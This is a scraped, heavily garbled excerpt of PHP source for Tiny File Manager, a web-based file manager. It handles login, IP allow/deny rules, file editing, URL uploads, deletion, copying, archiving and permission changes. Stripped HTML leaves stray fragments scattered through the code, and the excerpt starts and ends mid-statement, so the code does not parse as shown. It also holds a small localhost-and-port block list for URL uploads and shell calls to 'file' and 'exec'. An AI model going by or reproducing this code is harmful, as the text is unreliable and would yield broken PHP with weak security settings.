$root_url.$wd.DIRECTORY_SEPARATOR.$directories_users[$_SESSION[FM_SESSION_ID]['logged']]; } // clean $root_url $root_url = fm_clean_path($root_url); // abs path for site defined('FM_ROOT_URL') || define('FM_ROOT_URL', ($is_https ? 'https' : 'http') . '://' . $http_host . (!empty($root_url) ? '/' . $root_url : '')); defined('FM_SELF_URL') || define('FM_SELF_URL', ($is_https ? 'https' : 'http') . '://' . $http_host . $_SERVER['PHP_SELF']); // logout if (isset($_GET['logout'])) { unset($_SESSION[FM_SESSION_ID]['logged']); fm_redirect(FM_SELF_URL); } // Validate connection IP if($ip_ruleset != 'OFF'){ $clientIp = $_SERVER['REMOTE_ADDR']; $proceed = false; $whitelisted = in_array($clientIp, $ip_whitelist); $blacklisted = in_array($clientIp, $ip_blacklist); if($ip_ruleset == 'AND'){ if($whitelisted == true && $blacklisted == false){ $proceed = true; } } else if($ip_ruleset == 'OR'){ if($whitelisted == true || $blacklisted == false){ $proceed = true; } } if($proceed == false){ trigger_error('User connection denied from: ' . $clientIp, E_USER_WARNING); if($ip_silent == false){ fm_set_msg(lng('Access denied. IP restriction applicable'), 'error'); fm_show_header_login(); fm_show_message(); } exit(); } } // Auth if ($use_auth) { if (isset($_SESSION[FM_SESSION_ID]['logged'], $auth_users[$_SESSION[FM_SESSION_ID]['logged']])) { // Logged } elseif (isset($_POST['fm_usr'], $_POST['fm_pwd'])) { // Logging In sleep(1); if(function_exists('password_verify')) { if (isset($auth_users[$_POST['fm_usr']]) && isset($_POST['fm_pwd']) && password_verify($_POST['fm_pwd'], $auth_users[$_POST['fm_usr']])) { $_SESSION[FM_SESSION_ID]['logged'] = $_POST['fm_usr']; fm_set_msg(lng('You are logged in')); fm_redirect(FM_SELF_URL . '?p='); } else { unset($_SESSION[FM_SESSION_ID]['logged']); fm_set_msg(lng('Login failed. Invalid username or password'), 'error'); fm_redirect(FM_SELF_URL); } } else { fm_set_msg(lng('password_hash not supported, Upgrade PHP version'), 'error');; } } else { // Form unset($_SESSION[FM_SESSION_ID]['logged']); fm_show_header_login(); ?>
—— © CCP Programmers ——
".lng('Root path')." \"{$root_path}\" ".lng('not found!')." "; exit; } defined('FM_SHOW_HIDDEN') || define('FM_SHOW_HIDDEN', $show_hidden_files); defined('FM_ROOT_PATH') || define('FM_ROOT_PATH', $root_path); defined('FM_LANG') || define('FM_LANG', $lang); defined('FM_FILE_EXTENSION') || define('FM_FILE_EXTENSION', $allowed_file_extensions); defined('FM_UPLOAD_EXTENSION') || define('FM_UPLOAD_EXTENSION', $allowed_upload_extensions); defined('FM_EXCLUDE_ITEMS') || define('FM_EXCLUDE_ITEMS', (version_compare(PHP_VERSION, '7.0.0', '<') ? serialize($exclude_items) : $exclude_items)); defined('FM_DOC_VIEWER') || define('FM_DOC_VIEWER', $online_viewer); define('FM_READONLY', $use_auth && !empty($readonly_users) && isset($_SESSION[FM_SESSION_ID]['logged']) && in_array($_SESSION[FM_SESSION_ID]['logged'], $readonly_users)); define('FM_IS_WIN', DIRECTORY_SEPARATOR == '\\'); // always use ?p= if (!isset($_GET['p']) && empty($_FILES)) { fm_redirect(FM_SELF_URL . '?p='); } // get path $p = isset($_GET['p']) ? $_GET['p'] : (isset($_POST['p']) ? $_POST['p'] : ''); // clean path $p = fm_clean_path($p); // for ajax request - save $input = file_get_contents('php://input'); $_POST = (strpos($input, 'ajax') != FALSE && strpos($input, 'save') != FALSE) ? json_decode($input, true) : $_POST; // instead globals vars define('FM_PATH', $p); define('FM_USE_AUTH', $use_auth); define('FM_EDIT_FILE', $edit_files); defined('FM_ICONV_INPUT_ENC') || define('FM_ICONV_INPUT_ENC', $iconv_input_encoding); defined('FM_USE_HIGHLIGHTJS') || define('FM_USE_HIGHLIGHTJS', $use_highlightjs); defined('FM_HIGHLIGHTJS_STYLE') || define('FM_HIGHLIGHTJS_STYLE', $highlightjs_style); defined('FM_DATETIME_FORMAT') || define('FM_DATETIME_FORMAT', $datetime_format); unset($p, $use_auth, $iconv_input_encoding, $use_highlightjs, $highlightjs_style); /*************************** ACTIONS ***************************/ // AJAX Request if (isset($_POST['ajax']) && !FM_READONLY) { // save if (isset($_POST['type']) && $_POST['type'] == "save") { // get current path $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } // check path if (!is_dir($path)) { fm_redirect(FM_SELF_URL . '?p='); } $file = $_GET['edit']; $file = fm_clean_path($file); $file = str_replace('/', '', $file); if ($file == '' || !is_file($path . '/' . $file)) { fm_set_msg(lng('File not found'), 'error'); fm_redirect(FM_SELF_URL . '?p=' . urlencode(FM_PATH)); } header('X-XSS-Protection:0'); $file_path = $path . '/' . $file; $writedata = $_POST['content']; $fd = fopen($file_path, "w"); $write_results = @fwrite($fd, $writedata); fclose($fd); if ($write_results === false){ header("HTTP/1.1 500 Internal Server Error"); die("Could Not Write File! - Check Permissions / Ownership"); } die(true); } //search : get list of files from the current folder if(isset($_POST['type']) && $_POST['type']=="search") { $dir = FM_ROOT_PATH; $response = scan(fm_clean_path($_POST['path']), $_POST['content']); echo json_encode($response); exit(); } // backup files if (isset($_POST['type']) && $_POST['type'] == "backup" && !empty($_POST['file'])) { $fileName = $_POST['file']; $fullPath = FM_ROOT_PATH . '/'; if (!empty($_POST['path'])) { $relativeDirPath = fm_clean_path($_POST['path']); $fullPath .= "{$relativeDirPath}/"; } $date = date("dMy-His"); $newFileName = "{$fileName}-{$date}.bak"; $fullyQualifiedFileName = $fullPath . $fileName; try { if (!file_exists($fullyQualifiedFileName)) { throw new Exception("File {$fileName} not found"); } if (copy($fullyQualifiedFileName, $fullPath . $newFileName)) { echo "Backup {$newFileName} created"; } else { throw new Exception("Could not copy file {$fileName}"); } } catch (Exception $e) { echo $e->getMessage(); } } // Save Config if (isset($_POST['type']) && $_POST['type'] == "settings") { global $cfg, $lang, $report_errors, $show_hidden_files, $lang_list, $hide_Cols, $calc_folder, $theme; $newLng = $_POST['js-language']; fm_get_translations([]); if (!array_key_exists($newLng, $lang_list)) { $newLng = 'en'; } $erp = isset($_POST['js-error-report']) && $_POST['js-error-report'] == "true" ? true : false; $shf = isset($_POST['js-show-hidden']) && $_POST['js-show-hidden'] == "true" ? true : false; $hco = isset($_POST['js-hide-cols']) && $_POST['js-hide-cols'] == "true" ? true : false; $caf = isset($_POST['js-calc-folder']) && $_POST['js-calc-folder'] == "true" ? true : false; $te3 = $_POST['js-theme-3']; if ($cfg->data['lang'] != $newLng) { $cfg->data['lang'] = $newLng; $lang = $newLng; } if ($cfg->data['error_reporting'] != $erp) { $cfg->data['error_reporting'] = $erp; $report_errors = $erp; } if ($cfg->data['show_hidden'] != $shf) { $cfg->data['show_hidden'] = $shf; $show_hidden_files = $shf; } if ($cfg->data['show_hidden'] != $shf) { $cfg->data['show_hidden'] = $shf; $show_hidden_files = $shf; } if ($cfg->data['hide_Cols'] != $hco) { $cfg->data['hide_Cols'] = $hco; $hide_Cols = $hco; } if ($cfg->data['calc_folder'] != $caf) { $cfg->data['calc_folder'] = $caf; $calc_folder = $caf; } if ($cfg->data['theme'] != $te3) { $cfg->data['theme'] = $te3; $theme = $te3; } $cfg->save(); echo true; } // new password hash if (isset($_POST['type']) && $_POST['type'] == "pwdhash") { $res = isset($_POST['inputPassword2']) && !empty($_POST['inputPassword2']) ? password_hash($_POST['inputPassword2'], PASSWORD_DEFAULT) : ''; echo $res; } //upload using url if(isset($_POST['type']) && $_POST['type'] == "upload" && !empty($_REQUEST["uploadurl"])) { $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } function event_callback ($message) { global $callback; echo json_encode($message); } function get_file_path () { global $path, $fileinfo, $temp_file; return $path."/".basename($fileinfo->name); } $url = !empty($_REQUEST["uploadurl"]) && preg_match("|^http(s)?://.+$|", stripslashes($_REQUEST["uploadurl"])) ? stripslashes($_REQUEST["uploadurl"]) : null; //prevent 127.* domain and known ports $domain = parse_url($url, PHP_URL_HOST); $port = parse_url($url, PHP_URL_PORT); $knownPorts = [22, 23, 25, 3306]; if (preg_match("/^localhost$|^127(?:\.[0-9]+){0,2}\.[0-9]+$|^(?:0*\:)*?:?0*1$/i", $domain) || in_array($port, $knownPorts)) { $err = array("message" => "URL is not allowed"); event_callback(array("fail" => $err)); exit(); } $use_curl = false; $temp_file = tempnam(sys_get_temp_dir(), "upload-"); $fileinfo = new stdClass(); $fileinfo->name = trim(basename($url), ".\x00..\x20"); $allowed = (FM_UPLOAD_EXTENSION) ? explode(',', FM_UPLOAD_EXTENSION) : false; $ext = strtolower(pathinfo($fileinfo->name, PATHINFO_EXTENSION)); $isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true; $err = false; if(!$isFileAllowed) { $err = array("message" => "File extension is not allowed"); event_callback(array("fail" => $err)); exit(); } if (!$url) { $success = false; } else if ($use_curl) { @$fp = fopen($temp_file, "w"); @$ch = curl_init($url); curl_setopt($ch, CURLOPT_NOPROGRESS, false ); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_FILE, $fp); @$success = curl_exec($ch); $curl_info = curl_getinfo($ch); if (!$success) { $err = array("message" => curl_error($ch)); } @curl_close($ch); fclose($fp); $fileinfo->size = $curl_info["size_download"]; $fileinfo->type = $curl_info["content_type"]; } else { $ctx = stream_context_create(); @$success = copy($url, $temp_file, $ctx); if (!$success) { $err = error_get_last(); } } if ($success) { $success = rename($temp_file, get_file_path()); } if ($success) { event_callback(array("done" => $fileinfo)); } else { unlink($temp_file); if (!$err) { $err = array("message" => "Invalid url parameter"); } event_callback(array("fail" => $err)); } } exit(); } // Delete file / folder if (isset($_GET['del']) && !FM_READONLY) { $del = str_replace( '/', '', fm_clean_path( $_GET['del'] ) ); if ($del != '' && $del != '..' && $del != '.') { $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } $is_dir = is_dir($path . '/' . $del); if (fm_rdelete($path . '/' . $del)) { $msg = $is_dir ? lng('Folder').' %s '.lng('Deleted') : lng('File').' %s '.lng('Deleted'); fm_set_msg(sprintf($msg, fm_enc($del))); } else { $msg = $is_dir ? lng('Folder').' %s '.lng('not deleted') : lng('File').' %s '.lng('not deleted'); fm_set_msg(sprintf($msg, fm_enc($del)), 'error'); } } else { fm_set_msg(lng('Invalid file or folder name'), 'error'); } fm_redirect(FM_SELF_URL . '?p=' . urlencode(FM_PATH)); } // Create folder if (isset($_GET['new']) && isset($_GET['type']) && !FM_READONLY) { $type = $_GET['type']; $new = str_replace( '/', '', fm_clean_path( strip_tags( $_GET['new'] ) ) ); if (fm_isvalid_filename($new) && $new != '' && $new != '..' && $new != '.') { $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } if ($_GET['type'] == "file") { if (!file_exists($path . '/' . $new)) { if(fm_is_valid_ext($new)) { @fopen($path . '/' . $new, 'w') or die('Cannot open file: ' . $new); fm_set_msg(sprintf(lng('File').' %s '.lng('Created'), fm_enc($new))); } else { fm_set_msg(lng('File extension is not allowed'), 'error'); } } else { fm_set_msg(sprintf(lng('File').' %s '.lng('already exists'), fm_enc($new)), 'alert'); } } else { if (fm_mkdir($path . '/' . $new, false) === true) { fm_set_msg(sprintf(lng('Folder').' %s '.lng('Created'), $new)); } elseif (fm_mkdir($path . '/' . $new, false) === $path . '/' . $new) { fm_set_msg(sprintf(lng('Folder').' %s '.lng('already exists'), fm_enc($new)), 'alert'); } else { fm_set_msg(sprintf(lng('Folder').' %s '.lng('not created'), fm_enc($new)), 'error'); } } } else { fm_set_msg(lng('Invalid characters in file or folder name'), 'error'); } fm_redirect(FM_SELF_URL . '?p=' . urlencode(FM_PATH)); } // Copy folder / file if (isset($_GET['copy'], $_GET['finish']) && !FM_READONLY) { // from $copy = $_GET['copy']; $copy = fm_clean_path($copy); // empty path if ($copy == '') { fm_set_msg(lng('Source path not defined'), 'error'); fm_redirect(FM_SELF_URL . '?p=' . urlencode(FM_PATH)); } // abs path from $from = FM_ROOT_PATH . '/' . $copy; // abs path to $dest = FM_ROOT_PATH; if (FM_PATH != '') { $dest .= '/' . FM_PATH; } $dest .= '/' . basename($from); // move? $move = isset($_GET['move']); // copy/move/duplicate if ($from != $dest) { $msg_from = trim(FM_PATH . '/' . basename($from), '/'); if ($move) { // Move and to != from so just perform move $rename = fm_rename($from, $dest); if ($rename) { fm_set_msg(sprintf(lng('Moved from').' %s '.lng('to').' %s', fm_enc($copy), fm_enc($msg_from))); } elseif ($rename === null) { fm_set_msg(lng('File or folder with this path already exists'), 'alert'); } else { fm_set_msg(sprintf(lng('Error while moving from').' %s '.lng('to').' %s', fm_enc($copy), fm_enc($msg_from)), 'error'); } } else { // Not move and to != from so copy with original name if (fm_rcopy($from, $dest)) { fm_set_msg(sprintf(lng('Copied from').' %s '.lng('to').' %s', fm_enc($copy), fm_enc($msg_from))); } else { fm_set_msg(sprintf(lng('Error while copying from').' %s '.lng('to').' %s', fm_enc($copy), fm_enc($msg_from)), 'error'); } } } else { if (!$move){ //Not move and to = from so duplicate $msg_from = trim(FM_PATH . '/' . basename($from), '/'); $fn_parts = pathinfo($from); $extension_suffix = ''; if(!is_dir($from)){ $extension_suffix = '.'.$fn_parts['extension']; } //Create new name for duplicate $fn_duplicate = $fn_parts['dirname'].'/'.$fn_parts['filename'].'-'.date('YmdHis').$extension_suffix; $loop_count = 0; $max_loop = 1000; // Check if a file with the duplicate name already exists, if so, make new name (edge case...) while(file_exists($fn_duplicate) & $loop_count < $max_loop){ $fn_parts = pathinfo($fn_duplicate); $fn_duplicate = $fn_parts['dirname'].'/'.$fn_parts['filename'].'-copy'.$extension_suffix; $loop_count++; } if (fm_rcopy($from, $fn_duplicate, False)) { fm_set_msg(sprintf('Copyied from %s to %s', fm_enc($copy), fm_enc($fn_duplicate))); } else { fm_set_msg(sprintf('Error while copying from %s to %s', fm_enc($copy), fm_enc($fn_duplicate)), 'error'); } } else{ fm_set_msg(lng('Paths must be not equal'), 'alert'); } } fm_redirect(FM_SELF_URL . '?p=' . urlencode(FM_PATH)); } // Mass copy files/ folders if (isset($_POST['file'], $_POST['copy_to'], $_POST['finish']) && !FM_READONLY) { // from $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } // to $copy_to_path = FM_ROOT_PATH; $copy_to = fm_clean_path($_POST['copy_to']); if ($copy_to != '') { $copy_to_path .= '/' . $copy_to; } if ($path == $copy_to_path) { fm_set_msg(lng('Paths must be not equal'), 'alert'); fm_redirect(FM_SELF_URL . '?p=' . urlencode(FM_PATH)); } if (!is_dir($copy_to_path)) { if (!fm_mkdir($copy_to_path, true)) { fm_set_msg('Unable to create destination folder', 'error'); fm_redirect(FM_SELF_URL . '?p=' . urlencode(FM_PATH)); } } // move? $move = isset($_POST['move']); // copy/move $errors = 0; $files = $_POST['file']; if (is_array($files) && count($files)) { foreach ($files as $f) { if ($f != '') { // abs path from $from = $path . '/' . $f; // abs path to $dest = $copy_to_path . '/' . $f; // do if ($move) { $rename = fm_rename($from, $dest); if ($rename === false) { $errors++; } } else { if (!fm_rcopy($from, $dest)) { $errors++; } } } } if ($errors == 0) { $msg = $move ? 'Selected files and folders moved' : 'Selected files and folders copied'; fm_set_msg($msg); } else { $msg = $move ? 'Error while moving items' : 'Error while copying items'; fm_set_msg($msg, 'error'); } } else { fm_set_msg(lng('Nothing selected'), 'alert'); } fm_redirect(FM_SELF_URL . '?p=' . urlencode(FM_PATH)); } // Rename if (isset($_GET['ren'], $_GET['to']) && !FM_READONLY) { // old name $old = $_GET['ren']; $old = fm_clean_path($old); $old = str_replace('/', '', $old); // new name $new = $_GET['to']; $new = fm_clean_path(strip_tags($new)); $new = str_replace('/', '', $new); // path $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } // rename if (fm_isvalid_filename($new) && $old != '' && $new != '') { if (fm_rename($path . '/' . $old, $path . '/' . $new)) { fm_set_msg(sprintf(lng('Renamed from').' %s '. lng('to').' %s', fm_enc($old), fm_enc($new))); } else { fm_set_msg(sprintf(lng('Error while renaming from').' %s '. lng('to').' %s', fm_enc($old), fm_enc($new)), 'error'); } } else { fm_set_msg(lng('Invalid characters in file name'), 'error'); } fm_redirect(FM_SELF_URL . '?p=' . urlencode(FM_PATH)); } // Download if (isset($_GET['dl'])) { $dl = $_GET['dl']; $dl = fm_clean_path($dl); $dl = str_replace('/', '', $dl); $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } if ($dl != '' && is_file($path . '/' . $dl)) { fm_download_file($path . '/' . $dl, $dl, 1024); exit; } else { fm_set_msg(lng('File not found'), 'error'); fm_redirect(FM_SELF_URL . '?p=' . urlencode(FM_PATH)); } } // Upload if (!empty($_FILES) && !FM_READONLY) { $override_file_name = false; $f = $_FILES; $path = FM_ROOT_PATH; $ds = DIRECTORY_SEPARATOR; if (FM_PATH != '') { $path .= '/' . FM_PATH; } $errors = 0; $uploads = 0; $allowed = (FM_UPLOAD_EXTENSION) ? explode(',', FM_UPLOAD_EXTENSION) : false; $response = array ( 'status' => 'error', 'info' => 'Oops! Try again' ); $filename = $f['file']['name']; $tmp_name = $f['file']['tmp_name']; $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION)); $isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true; if(!fm_isvalid_filename($filename) && !fm_isvalid_filename($_REQUEST['fullpath'])) { $response = array ( 'status' => 'error', 'info' => "Invalid File name!", ); echo json_encode($response); exit(); } $targetPath = $path . $ds; if ( is_writable($targetPath) ) { $fullPath = $path . '/' . $_REQUEST['fullpath']; $folder = substr($fullPath, 0, strrpos($fullPath, "/")); if(file_exists ($fullPath) && !$override_file_name) { $ext_1 = $ext ? '.'.$ext : ''; $fullPath = str_replace($ext_1, '', $fullPath) .'_'. date('ymdHis'). $ext_1; } if (!is_dir($folder)) { $old = umask(0); mkdir($folder, 0777, true); umask($old); } if (empty($f['file']['error']) && !empty($tmp_name) && $tmp_name != 'none' && $isFileAllowed) { if (move_uploaded_file($tmp_name, $fullPath)) { // Be sure that the file has been uploaded if ( file_exists($fullPath) ) { $response = array ( 'status' => 'success', 'info' => "file upload successful" ); } else { $response = array ( 'status' => 'error', 'info' => 'Couldn\'t upload the requested file.' ); } } else { $response = array ( 'status' => 'error', 'info' => "Error while uploading files. Uploaded files $uploads", ); } } } else { $response = array ( 'status' => 'error', 'info' => 'The specified folder for upload isn\'t writeable.' ); } // Return the response echo json_encode($response); exit(); } // Mass deleting if (isset($_POST['group'], $_POST['delete']) && !FM_READONLY) { $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } $errors = 0; $files = $_POST['file']; if (is_array($files) && count($files)) { foreach ($files as $f) { if ($f != '') { $new_path = $path . '/' . $f; if (!fm_rdelete($new_path)) { $errors++; } } } if ($errors == 0) { fm_set_msg(lng('Selected files and folder deleted')); } else { fm_set_msg(lng('Error while deleting items'), 'error'); } } else { fm_set_msg(lng('Nothing selected'), 'alert'); } fm_redirect(FM_SELF_URL . '?p=' . urlencode(FM_PATH)); } // Pack files if (isset($_POST['group']) && (isset($_POST['zip']) || isset($_POST['tar'])) && !FM_READONLY) { $path = FM_ROOT_PATH; $ext = 'zip'; if (FM_PATH != '') { $path .= '/' . FM_PATH; } //set pack type $ext = isset($_POST['tar']) ? 'tar' : 'zip'; if (($ext == "zip" && !class_exists('ZipArchive')) || ($ext == "tar" && !class_exists('PharData'))) { fm_set_msg(lng('Operations with archives are not available'), 'error'); fm_redirect(FM_SELF_URL . '?p=' . urlencode(FM_PATH)); } $files = $_POST['file']; if (!empty($files)) { chdir($path); if (count($files) == 1) { $one_file = reset($files); $one_file = basename($one_file); $zipname = $one_file . '_' . date('ymd_His') . '.'.$ext; } else { $zipname = 'archive_' . date('ymd_His') . '.'.$ext; } if($ext == 'zip') { $zipper = new FM_Zipper(); $res = $zipper->create($zipname, $files); } elseif ($ext == 'tar') { $tar = new FM_Zipper_Tar(); $res = $tar->create($zipname, $files); } if ($res) { fm_set_msg(sprintf(lng('Archive').' %s '.lng('Created'), fm_enc($zipname))); } else { fm_set_msg(lng('Archive not created'), 'error'); } } else { fm_set_msg(lng('Nothing selected'), 'alert'); } fm_redirect(FM_SELF_URL . '?p=' . urlencode(FM_PATH)); } // Unpack if (isset($_GET['unzip']) && !FM_READONLY) { $unzip = $_GET['unzip']; $unzip = fm_clean_path($unzip); $unzip = str_replace('/', '', $unzip); $isValid = false; $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } if ($unzip != '' && is_file($path . '/' . $unzip)) { $zip_path = $path . '/' . $unzip; $ext = pathinfo($zip_path, PATHINFO_EXTENSION); $isValid = true; } else { fm_set_msg(lng('File not found'), 'error'); } if (($ext == "zip" && !class_exists('ZipArchive')) || ($ext == "tar" && !class_exists('PharData'))) { fm_set_msg(lng('Operations with archives are not available'), 'error'); fm_redirect(FM_SELF_URL . '?p=' . urlencode(FM_PATH)); } if ($isValid) { //to folder $tofolder = ''; if (isset($_GET['tofolder'])) { $tofolder = pathinfo($zip_path, PATHINFO_FILENAME); if (fm_mkdir($path . '/' . $tofolder, true)) { $path .= '/' . $tofolder; } } if($ext == "zip") { $zipper = new FM_Zipper(); $res = $zipper->unzip($zip_path, $path); } elseif ($ext == "tar") { try { $gzipper = new PharData($zip_path); if (@$gzipper->extractTo($path,null, true)) { $res = true; } else { $res = false; } } catch (Exception $e) { //TODO:: need to handle the error $res = true; } } if ($res) { fm_set_msg(lng('Archive unpacked')); } else { fm_set_msg(lng('Archive not unpacked'), 'error'); } } else { fm_set_msg(lng('File not found'), 'error'); } fm_redirect(FM_SELF_URL . '?p=' . urlencode(FM_PATH)); } // Change Perms (not for Windows) if (isset($_POST['chmod']) && !FM_READONLY && !FM_IS_WIN) { $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } $file = $_POST['chmod']; $file = fm_clean_path($file); $file = str_replace('/', '', $file); if ($file == '' || (!is_file($path . '/' . $file) && !is_dir($path . '/' . $file))) { fm_set_msg(lng('File not found'), 'error'); fm_redirect(FM_SELF_URL . '?p=' . urlencode(FM_PATH)); } $mode = 0; if (!empty($_POST['ur'])) { $mode |= 0400; } if (!empty($_POST['uw'])) { $mode |= 0200; } if (!empty($_POST['ux'])) { $mode |= 0100; } if (!empty($_POST['gr'])) { $mode |= 0040; } if (!empty($_POST['gw'])) { $mode |= 0020; } if (!empty($_POST['gx'])) { $mode |= 0010; } if (!empty($_POST['or'])) { $mode |= 0004; } if (!empty($_POST['ow'])) { $mode |= 0002; } if (!empty($_POST['ox'])) { $mode |= 0001; } if (@chmod($path . '/' . $file, $mode)) { fm_set_msg(lng('Permissions changed')); } else { fm_set_msg(lng('Permissions not changed'), 'error'); } fm_redirect(FM_SELF_URL . '?p=' . urlencode(FM_PATH)); } /*************************** /ACTIONS ***************************/ // get current path $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } // check path if (!is_dir($path)) { fm_redirect(FM_SELF_URL . '?p='); } // get parent folder $parent = fm_get_parent_path(FM_PATH); $objects = is_readable($path) ? scandir($path) : array(); $folders = array(); $files = array(); $current_path = array_slice(explode("/",$path), -1)[0]; if (is_array($objects) && fm_is_exclude_items($current_path)) { foreach ($objects as $file) { if ($file == '.' || $file == '..') { continue; } if (!FM_SHOW_HIDDEN && substr($file, 0, 1) === '.') { continue; } $new_path = $path . '/' . $file; if (@is_file($new_path) && fm_is_exclude_items($file)) { $files[] = $file; } elseif (@is_dir($new_path) && $file != '.' && $file != '..' && fm_is_exclude_items($file)) { $folders[] = $file; } } } if (!empty($files)) { natcasesort($files); } if (!empty($folders)) { natcasesort($folders); } // upload form if (isset($_GET['upload']) && !FM_READONLY) { fm_show_header(); // HEADER fm_show_nav_path(FM_PATH); // current path //get the allowed file extensions function getUploadExt() { $extArr = explode(',', FM_UPLOAD_EXTENSION); if(FM_UPLOAD_EXTENSION && $extArr) { array_walk($extArr, function(&$x) {$x = ".$x";}); return implode(',', $extArr); } return ''; } ?>

:

' . PHP_EOL; } ?>

: , ', $copy_files) ?>

:
/

 

Copying

Source path:
Destination folder:

Copy   Move   Cancel

Tiny File Manager

Author: Prasath Mani

Mail Us: ccpprogrammers[at]gmail.com

""

Full path:
File size:
MIME-type:
Files in archive:
Total size:
Size in archive:
Compression: %
'; } // Text info if ($is_text) { $is_utf8 = fm_is_utf8($content); if (function_exists('iconv')) { if (!$is_utf8) { $content = iconv(FM_ICONV_INPUT_ENC, 'UTF-8//IGNORE', $content); } } echo 'Charset: ' . ($is_utf8 ? 'utf-8' : '8 bit') . '
'; } ?>

           

'; } else if($online_viewer == 'microsoft') { echo ''; } } elseif ($is_zip) { // ZIP content if ($filenames !== false) { echo ''; foreach ($filenames as $fn) { if ($fn['folder']) { echo '' . fm_enc($fn['name']) . '
'; } else { echo $fn['name'] . ' (' . fm_get_filesize($fn['filesize']) . ')
'; } } echo ''; } else { echo '

'.lng('Error while fetching archive info').'

'; } } elseif ($is_image) { // Image content if (in_array($ext, array('gif', 'jpg', 'jpeg', 'png', 'bmp', 'ico', 'svg', 'webp', 'avif'))) { echo '

'; } } elseif ($is_audio) { // Audio content echo '

'; } elseif ($is_video) { // Video content echo '
'; } elseif ($is_text) { if (FM_USE_HIGHLIGHTJS) { // highlight $hljs_classes = array( 'shtml' => 'xml', 'htaccess' => 'apache', 'phtml' => 'php', 'lock' => 'json', 'svg' => 'xml', ); $hljs_class = isset($hljs_classes[$ext]) ? 'lang-' . $hljs_classes[$ext] : 'lang-' . $ext; if (empty($ext) || in_array(strtolower($file), fm_get_text_names()) || preg_match('#\.min\.(css|js)$#i', $file)) { $hljs_class = 'nohighlight'; } $content = '
' . fm_enc($content) . '
'; } elseif (in_array($ext, array('php', 'php4', 'php5', 'phtml', 'phps'))) { // php highlight $content = highlight_string($content, true); } else { $content = '
' . fm_enc($content) . '
'; } echo $content; } ?>
' . htmlspecialchars($content) . ''; } elseif ($is_text) { echo '
' . htmlspecialchars($content) . '
'; } else { fm_set_msg(lng('FILE EXTENSION HAS NOT SUPPORTED'), 'error'); } ?>

Full path:

 

'?'); $group = array('name' => '?'); } ?> '?'); $group = array('name' => '?'); } ?>
..
' . readlink($path . '/' . $f) . '' : '') ?>
 ">
' . readlink($path . '/' . $f) . '' : '') ?>
">
'.fm_get_filesize($all_files_size).'' ?> '.$num_files.'' ?> '.$num_folders.'' ?> '.fm_get_filesize(@disk_free_space($path)) .' '.lng('FreeOf').' '.fm_get_filesize(@disk_total_space($path)).''; ?>
Tiny File Manager
Tiny File Manager
= $time1 && $upd) { return false; } } $ok = copy($f1, $f2); if ($ok) { touch($f2, $time1); } return $ok; } /** * Get mime type * @param string $file_path * @return mixed|string */ function fm_get_mime_type($file_path) { if (function_exists('finfo_open')) { $finfo = finfo_open(FILEINFO_MIME_TYPE); $mime = finfo_file($finfo, $file_path); finfo_close($finfo); return $mime; } elseif (function_exists('mime_content_type')) { return mime_content_type($file_path); } elseif (!stristr(ini_get('disable_functions'), 'shell_exec')) { $file = escapeshellarg($file_path); $mime = shell_exec('file -bi ' . $file); return $mime; } else { return '--'; } } /** * HTTP Redirect * @param string $url * @param int $code */ function fm_redirect($url, $code = 302) { header('Location: ' . $url, true, $code); exit; } /** * Path traversal prevention and clean the url * It replaces (consecutive) occurrences of / and \\ with whatever is in DIRECTORY_SEPARATOR, and processes /. and /.. fine. * @param $path * @return string */ function get_absolute_path($path) { $path = str_replace(array('/', '\\'), DIRECTORY_SEPARATOR, $path); $parts = array_filter(explode(DIRECTORY_SEPARATOR, $path), 'strlen'); $absolutes = array(); foreach ($parts as $part) { if ('.' == $part) continue; if ('..' == $part) { array_pop($absolutes); } else { $absolutes[] = $part; } } return implode(DIRECTORY_SEPARATOR, $absolutes); } /** * Clean path * @param string $path * @return string */ function fm_clean_path($path, $trim = true) { $path = $trim ? trim($path) : $path; $path = trim($path, '\\/'); $path = str_replace(array('../', '..\\'), '', $path); $path = get_absolute_path($path); if ($path == '..') { $path = ''; } return str_replace('\\', '/', $path); } /** * Get parent path * @param string $path * @return bool|string */ function fm_get_parent_path($path) { $path = fm_clean_path($path); if ($path != '') { $array = explode('/', $path); if (count($array) > 1) { $array = array_slice($array, 0, -1); return implode('/', $array); } return ''; } return false; } /** * Check file is in exclude list * @param string $file * @return bool */ function fm_is_exclude_items($file) { $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION)); if (isset($exclude_items) and sizeof($exclude_items)) { unset($exclude_items); } $exclude_items = FM_EXCLUDE_ITEMS; if (version_compare(PHP_VERSION, '7.0.0', '<')) { $exclude_items = unserialize($exclude_items); } if (!in_array($file, $exclude_items) && !in_array("*.$ext", $exclude_items)) { return true; } return false; } /** * get language translations from json file * @param int $tr * @return array */ function fm_get_translations($tr) { try { $content = @file_get_contents('translation.json'); if($content !== FALSE) { $lng = json_decode($content, TRUE); global $lang_list; foreach ($lng["language"] as $key => $value) { $code = $value["code"]; $lang_list[$code] = $value["name"]; if ($tr) $tr[$code] = $value["translation"]; } return $tr; } } catch (Exception $e) { echo $e; } } /** * @param $file * Recover all file sizes larger than > 2GB. * Works on php 32bits and 64bits and supports linux * @return int|string */ function fm_get_size($file) { static $iswin; static $isdarwin; if (!isset($iswin)) { $iswin = (strtoupper(substr(PHP_OS, 0, 3)) == 'WIN'); } if (!isset($isdarwin)) { $isdarwin = (strtoupper(substr(PHP_OS, 0)) == "DARWIN"); } static $exec_works; if (!isset($exec_works)) { $exec_works = (function_exists('exec') && !ini_get('safe_mode') && @exec('echo EXEC') == 'EXEC'); } // try a shell command if ($exec_works) { $arg = escapeshellarg($file); 